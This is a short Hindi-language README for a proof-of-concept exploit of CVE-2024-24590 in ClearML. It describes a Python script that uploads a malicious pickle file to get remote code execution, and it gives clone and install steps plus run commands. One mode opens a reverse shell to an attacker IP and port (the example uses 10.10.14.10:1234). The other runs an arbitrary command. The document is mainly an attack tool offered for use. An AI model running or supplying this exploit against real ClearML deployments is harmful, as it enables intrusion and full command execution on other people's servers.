
CVE-2024-24590 ClearML RCE&CMD POC
यह रिपॉजिटरी CVE-2024-24590 के लिए एक Python शोषण स्क्रिप्ट शामिल करती है। स्क्रिप्ट ClearML पर एक दुर्भावनापूर्ण pickle फ़ाइल अपलोड करने के लिए डिज़ाइन की गई है, जो रिवर्स शेल या कस्टम कमांड निष्पादित करती है।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
cd CVE-2024-24590-ClearML-RCE-CMD-POC
ClearML SDK स्थापित करें:
pip install clearml
clearml-init
स्क्रिप्ट ऑपरेशन के दो मोड का समर्थन करती है: default और cmd।
इस मोड में, आपको रिवर्स शेल स्थापित करने के लिए हमलावर का IP और पोर्ट प्रदान करना होगा।
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
इस मोड में, आप निष्पादित होने वाला एक कस्टम कमांड प्रदान कर सकते हैं।
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"